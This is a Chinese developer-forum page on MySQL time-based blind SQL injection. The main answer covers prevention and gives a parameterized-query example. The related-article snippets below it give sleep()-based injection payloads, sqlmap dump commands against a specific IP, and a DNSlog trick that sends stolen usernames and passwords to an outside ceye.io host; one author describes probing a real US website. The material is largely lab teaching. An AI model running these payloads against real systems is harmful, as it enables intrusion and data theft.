开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

mysql 延时盲注

基础概念

MySQL延时盲注（Blind SQL Injection with Time Delay）是一种SQL注入攻击方式，攻击者通过在SQL查询中插入特定的时间延迟函数，根据响应时间来判断SQL查询的结果。这种攻击方式适用于无法直接从应用程序返回错误信息或结果的情况。

相关优势

隐蔽性：由于攻击者通过响应时间来判断结果，因此攻击痕迹不易被发现。
适用性广：适用于各种无法直接返回错误信息或结果的场景。

类型

基于时间的盲注：通过在SQL查询中插入SLEEP()函数或其他时间延迟函数，根据响应时间来判断结果。
基于布尔的盲注：通过在SQL查询中插入条件语句，根据响应时间来判断条件是否成立。

应用场景

Web应用程序：攻击者通过构造恶意SQL查询，利用延时盲注获取数据库中的敏感信息。
API接口：攻击者通过构造恶意API请求，利用延时盲注获取数据库中的敏感信息。

遇到的问题及解决方法

问题：如何防止MySQL延时盲注？

解决方法：

输入验证：对用户输入进行严格的验证和过滤，防止恶意SQL代码的注入。
参数化查询：使用预编译语句和参数化查询，避免SQL注入攻击。
最小权限原则：为数据库用户分配最小的权限，限制其对数据库的操作。
安全配置：关闭不必要的MySQL功能和服务，如LOAD DATA INFILE、SELECT ... INTO OUTFILE等。
监控和日志：定期检查数据库日志，监控异常的SQL查询行为。

示例代码

以下是一个使用参数化查询防止SQL注入的示例：

import mysql.connector

# 连接数据库
db = mysql.connector.connect(
    host="localhost",
    user="yourusername",
    password="yourpassword",
    database="yourdatabase"
)

# 创建游标
cursor = db.cursor()

# 用户输入
user_input = "example"

# 参数化查询
query = "SELECT * FROM users WHERE username = %s"
cursor.execute(query, (user_input,))

# 获取结果
results = cursor.fetchall()

# 关闭连接
cursor.close()
db.close()

参考链接

MySQL官方文档 - 防止SQL注入

通过以上方法，可以有效防止MySQL延时盲注攻击，保护数据库的安全。

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

Microsoft SQL Server手注之延时型时间盲注

延迟注入简介延时函数 WAITFOR DELAY WAITFOR是SQL Server中Transact-SQL提供的⼀个流程控制语句。它的作⽤就是等待特定时间，然后继续执⾏后续的语句。...如果将该语句成功注⼊后，会造成数据库返回记录和 Web请求也会响应延迟特定的时间。由于该语句不涉及条件判断等情况，所以容易注⼊成功。...根据Web请求是否有延迟，渗透测试⼈员就可以判断⽹站是否存在注⼊漏洞。同时，由于该语句并不返回特定内容，所以它也是盲注的重要检测⽅法。...0:0:n' ⽰例： WAITFOR DELAY '0:0:4' -- 表⽰延迟4秒 IF exists ()⼦句语法: IF exists () WAITFOR DELAY '0:0:5' 手工延时注入...1.判断是否存在注⼊ WAITFOR DELAY '0:0:4' ?

9.9K4 1

延时盲注——sqli-labs第9、10关

var3) var1：条件 var2：条件为真时返回的值 var3：条件为假时返回的值 sleep(var) 暂停执行var秒,可以为小数第9关确认场景首先确认场景，确定可以适用延时盲注...判断闭合符构造一个明显会延时的if()语句拼接到条件语句（where）后再依次尝试添加待确定的闭合符如果延时，则尝试的闭合符正确 http://172.16.11.222/sqli-labs/Less...将3>2换成要查找的数据，这就是前面几关的布尔盲注了。找到数据库名的长度 http://172.16.11.222/sqli-labs/Less-9/?...即为s ………… 后面的就和前几关的布尔盲注差不多了第10关同第9关，使用延时盲注

1K3 2

MySQL手注之布尔型盲注详解

saulGoodman 一个专注于红队攻防研究的公众号关注 MySQL手注之布尔型盲注详解布尔型盲注简介基于布尔型SQL盲注即在SQL注入过程中，应用程序仅仅返回True（页面）和False（页面...MySQL盲注常用函数 length() 返回字符串的长度，例如可以返回数据库名字的长度 substr() ⽤来截取字符串 ascii() 返回字符的ascii码 sleep(n) 将程序挂起⼀段时间...，n为n秒 if(expr1,expr2,expr3) 判断语句如果第⼀个语句正确就执⾏第⼆个语句如果错误执⾏第三个语句盲注流程 1、判断是否存在注入，是字符型还是数字型注入注入点原查询代码： $

11.5K2 1

1.3.1-SQL注入-SQL盲注-布尔盲注

SQL盲注-布尔盲注 01布尔盲注原理 $id=$_GET['id']; $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1 "; $result=mysql_query...($sql); $row=mysql_fetch_array($result); if($row) { echo "Right"; } else { echo "Wrong"; } 代码存在...然而页面即不会回显数据，也不会回显错误信息只返回 “Right” 与 “Wrong” 这里我们可以通过构造语句，来判断数据库信息的正确性，再通过页面的“真”和“假”来识别我们的判断是否正确，这既是布尔盲注...与正确页面不同的页面 1.如果页面返回“假”，说明系统执行的SQL语句为“假”如：id=1 and left((select version()),1)=5–+ 2.想办法构造语句，判断数据库中内容的值 02布尔盲注方法...ord() ord(mid((select user()),1,1))=114 mid() mid(a,b,c)从位置b开始，截取a字符串的c位ord()函数痛ascii(),将字符串转为ascii值 MySql

5794 0

sql盲注

文章源自【字节脉搏社区】-字节脉搏实验室作者-墨子辰扫描下方二维码进入社区：盲注是注入的一种，指的是在不知道数据库返回值的情况下对数据中的内容进行猜测，实施SQL注入。...盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。本次主要讲解的是基于布尔的盲注。...第二个是101 e 第三个是 99 c 第四个是117 u 第五个是114 r 第六个是105 i 第七个是116 t 第八个是121 y 可以得到数据库名字为：security 接下来头疼的爆数据表，盲注果然是很枯燥的事情...select ascii(substr((select password from users limit 0,1),1,1)))=68--+ 第一个密码：68,117,109,98 =>Dumb 注：

8921 0

SQL注入靶场Day3 布尔盲注&延时注入

Pass-10 布尔盲注-1 10.1手工注入+BurpSuite payload:?id=1 and 1=1 回显正常 payload:?...我又是Burp抓包喂Request又是--technique B直接让给用布尔盲注方法，也可能是最近网太差了，李师傅决定还是直接手工注入吧。...Sqlmap这个笨蛋，注入半天，愣是在我眼皮子低下把盲注测试过去了。靶场：你礼貌吗？？？？...我又是Burp抓包喂Request又是--technique B直接让给用布尔盲注方法，也可能是最近网太差了，李师傅决定还是直接手工注入吧。 Pass11 布尔盲注-2 1.查询数据库字段长度 ?...，但是我算可以达到盲敲盲注了，布尔盲注就是或者不是，而延时注入就是不困是不是都比个耶。

1.1K2 0

1.3.3-SQL注入-SQL盲注-Dnslog盲注

需要目标机器时windows系统 DnsLog盲注 DnsLog盲注原理 Dnslog平台：http://ceye.io/ http://ceye.io/profile curl mzq83x.ceye.io...curl `whoami`.mzq83x.ceye.io DnsLog盲注方法核心语法： SELECT LOAD_FILE(CONCAT('\\\\',(select database(...)),'.mysql.r5ourp.ceye.io\\abc')); sql语句不能含有特殊符号查表 ?...'\\\\',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.mysql.r5oup.ceye.io...id=1' and LOAD_FILE(CONCAT('\\\\',(select concat(username,password) from security.users limit 0,1),'.mysql.r5ourp.ceye.io

5604 0

一文搞定MySQL盲注

目前的CTF中MySQL的盲注依然是热点之一，然而盲注又被分成Like盲注、正则盲注、异或盲注等等太多类型，让新入门的萌新十分摸不到头脑。...目前CTF中十有八九是MySQL，所以本文也就全部讲MySQL了。 0x01 盲注介绍▸ 什么是盲注？...盲注有哪些分类？▸ 总体来讲，盲注分为布尔型和延时型两大类。...延时型也就是所谓的时间盲注，即在无法通过布尔盲注判断的情况下，通过响应时长来判断。在做延时盲注时，攻击者构造的SQL语句是这样的意思：如果满足xx条件，就sleep(5)，否则就不sleep。...)▸ 和C语言一样，是用来求次方的，我们依然利用数太大导致报错这个思路：优化▸ 我们可以发现，报错盲注和延时盲注很像，延时盲注是“条件满足就sleep”，报错盲注是“条件满足就error”，那么如果

2K4 0

1.3.2-SQL注入-SQL盲注-时间盲注

时间盲注时间盲注原理时间盲注方法 http://localhost:90/Less-10/?...information_schema.tables where table_schema=database() limit 0,1),1)='r',0,sleep(3))--+ 时间注入脚本 links 时间盲注

3991 0

延时注学习

SQL盲注：基于时间延迟注入靶场环境搭建所需软件 Phpstudy2016，sql注入靶场文件 Phpstduy 官网下载地址：https://www.xp.cn/ sql注入靶场下载地址：https...95 _ 127 DEL 本次 sql 延时注入选择的是第八关（图中所示）。 SQL 注入工具采用的基本都为盲注及其它注入。这里以 Mysql 盲注为示例：何为延时注入？...所谓延时注入主要针对页面无变化，无法用布尔真假判断，无法报错的情况下注入。...这里需要用上 Mysql 的 4 个函数：sleep()、if()、mid()、ord()； sleep() //延时 if(条件,True,False) //判断语句 mid(str,1,1) 截取...5 秒，如果不等于则延时 1 秒，我们这里可以用快捷方法，直接上 burpsuite 爆破即可访问该地址，然后抓包 http://127.0.0.1/Less-8/?

1.2K2 0

mysql高级注入4--盲注1

所谓盲注就是在正常页面没有输入点，或者无法影响页面输出的内容~ 然后我们无法借助页面来返回数据库中我们想要注出的数据，这时候就要构造sql语句让它报错，或者进行一系列的判断。...这一篇讲的基于布尔的盲注。科普文，给学弟妹的...大牛绕过绕过... 一、字符串返回字符函数 ? 不得不提的是ord函数和ascii函数的用法一样，假如str为空字符串，则返回值为 0 。...mysql中的start是从1开始的查看我当前的数据库是security ? 截取第一个字符串 ? 第二个 ? 2、mid()函数 mid()函数此函数为截取字符串一部分。...所谓的盲注就是没有输出点。就是你和数据库产生了交互，但是在页面上去没有显示数据库的内容。具体可以参考sqli labs 基础练习5~ ?...那么我们就没有办法像mysql客户端一样的回显了…不然怎么叫盲注。输入：http://localhost/sqli-labs/Less-5/?id=1 可以看到这个是正常页面。 ?

7506 0

(SQL盲注)FinalSQL

欢迎关注我的微信公众号《壳中之魂》环境：BUUCTF在线评测 (buuoj.cn) 和之前的靶机差不多，也是一个登录框，但是多了几个按钮，标出来的局子也提醒了是通过sql盲注 [fcc10e3cd3151abb347dcb726eb874b2...可以看到过滤了括号，所以报错注入派不上用场 [fc740f55a0dc49e17af72967275915bc.jpeg] 但是可以注入的点不止这一个，点击主页的按钮，可以发现这里有个数字型注入，可以尝试盲注...id=elt(length(database())>1,6) [3b9ac7beb0d9380c4ab53e01552d14e1.jpeg] 确定好可以使用elt函数进行盲注后，接下来就进入盲注阶段由于此注入点过滤掉了空格...，所以我采用()来绕过过滤，使用()绕过过滤有一个很大的问题就是会让语句很乱，所以我就现在本地，分段测试语句，确定语句可用后再在靶机上运行在写脚本之前要先获取盲注的的判断规则，首先先确定语句正确和语句错误的区别

1.7K2 0

基于 MySQL 布尔值的 SQL 盲注

通常在 Blind SQLi 中，您无法真正看到您输入的查询的输出。在这种情况下，验证漏洞的唯一方法是查看网站是否成功/部分加载。

1.3K3 1

基于时间的盲注

01 盲注简介盲注就是在sql注入过程中，sql语句执行的选择后，选择的数据不能回显到前端页面。此时，我们需要利用一些方法进行判断或者尝试，这个过程称之为盲注。...03 盲注分类基于布尔SQL盲注基于时间的SQL盲注基于报错的SQL盲注 04 盲注的流程找寻并确认sql盲注点强制产生通用错误界面注入带有副作用的查询根据布尔表达式的真假结果，结合不同的返回结果确认注入是否成功...测试过程：首先对name字段进行加锁，返回结果为1且时间为0证明加锁成功；图片建立另一个mysql连接，对同样的字段进行加锁，返回结果为0且时间是自定义的5，证明加锁失败；图片利用上面的基础理论加上时间盲注原理...and get_lock(‘column_name’,5); 图片值得注意的是，这种绕过方法是存在限制条件的，即数据库的连接必须是持久连接，我们所利用的也是前一个连接对后一个连接的阻碍作用从而导致延时产生...07 时间盲注的优缺点利用时间盲注的最大优点是对日志几乎没有影响，特别是与基于错误的攻击相比。

7601 0

SQL注入-报错盲注

我们这期的主题报错盲注，我们就得用SQLMAP进行报错盲注的漏洞利用原文是带图的，要看有图的划到最下方有我博客链接对站点http://219.153.49.228:41592/new_list.php...id=1" --dbs 查找数据库选择stormgroup，因为其他表都是MySQL自带的 sqlmap.py -u http://219.153.49.228:41592/new_list.php...name,password,status" --dump 查出用户名为mozhe ，password为3c48eb99af674cdec2686f9c264211a3 md5解密，即成功的完成了一次报错盲注

7301 0

sql盲注的学习

这几天在学习sql注入的有关内容，今天记录一下我认为比较重要的部分，即sql盲注，我一开始学习的时候看到了好多的函数，看着看着就弄混了，相信不少新入门的师傅也有类似的困惑，经过多番心理斗争，我终于决定将这部分知识好整理一下...盲注类型基于布尔的盲注特征被注入的页面没有sql语句执行错误的显示，页面只有正常返回和不正常返回两种状态示例这里我拿sqli-labs的less8作为布尔型盲注的例子我们可以看到这个页面正常会返回...You are in...........而不正常的时候会无任何返回，这就很符合布尔盲注的特征正常返回： ?...剩下的表名和字段将脚本稍作修改即可猜解出来，篇幅原因不再重复操作基于报错的盲注(floor报错注入) 原理该类型的注入利用了mysql的8652号BUG(官方链接:https://bugs.mysql.com...总结盲注是一个比较费神和考验逻辑的注入方式，在注入的过程中会做很多相同的工作，为了节省时间和精力，建议大家在平时练习的时候多编写自动脚本，这样能节省很多时间，避免做更多重复无用的工作

7993 0

SQL盲注学习笔记

什么是SQL盲注在网站中没有直接回显，没有输出结果，所以得一个一个的猜解长度、字符，通过数据库查询的True和false结果来判断，一般为布尔注入和时间注入，这篇主要记录时间注入，总结一下就是，当查询返回的结果为...1(True)时，通过sleep()来使数据库休息几秒，当访问的时候时间过长就说明该结果是正确的思路流程和一般的sql注入思路差不多，只是盲注更有技巧也更有难度正常的思路都是：数据库->表名->...($host, $user, $pass) or die("Unable to connect"); #连接数据库 mysql_select_db($db) or die("Unable to select...，输出点不会产生任何漏洞，写什么就输出什么，所以得用盲注来猜解把sql语句单独提出来 $sql="insert into client_ip (ip) values ('$ip')"; 这里可以构造注入语句为...# 语句 127.0.0.1')# #这是语句还是正常的 insert into client_ip (ip) values ('127.0.0.1')#) 因为过滤了逗号的原因，所以得换个方式构造盲注语句

4412 0

Microsoft SQL Server手注之布尔型盲注

判断是否存在注⼊ ' and 1=1 and 1=2 猜测数据库名先猜dbid是否存在： http://192.168.159.135:8080/get.aspx?

4.1K2 0

sql注入盲注高级技巧

sql注入盲注高级技巧对于sql盲注，常用的方法应该是二分法，如果是windows平台的话dnslog会是一种奇招，对于个人对盲注的理解，猜解需要大量时间和过多的经验，那么有没有一种比较不错的方式来进行盲注来达到快速又流程话的工作呢...选择sqlinjection（Blind）也就是盲注先从简单开始搞开局burp抓包判断有多少列. 猜解SQL查询语句中的字段数这个就很简单了由于是数字型注入我们就可以用简单的 ? ?...了那么现在我们就开始都用123456开始搞事情盲注需要了解的语法函数有几个很关键 length(str) 返回字符串str的长度，以字节为单位。...注意：mysql中的start是从1开始的 ASCII()函数用来把字符转换成ascii码值接下来就会用到这三个函数那么我就不采用二分法猜数据库名字了直接爆，用二分法猜要猜第一个字符之后第二个时间太长那么我们只需要一个字典就...多个表就多个标记你懂的这样的盲注速度真的是节约太多时间还有可以用时间注入的方法进行盲注 if(length(database())=1,sleep(5),1) if(ascii(substr(database

1.7K3 0

盲注基本原理

最近找到一个带有注入的美国网站，发现是盲注，简单讲讲盲注的原理。 1.xxx.com/index.php?...ID=79' order by 4--+ 返回正常，表明当前表中有4个字段 4.查看返回信息输入： ID=79' select 1,2,3,4 --+ 尝试了很多次都不会显示任何信息，于是尝试盲注...table_name from information_schema.tables where table_schema=database()),1,1))>0--+ 这个payload不好直观理解，我们到本地mysql

8082 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭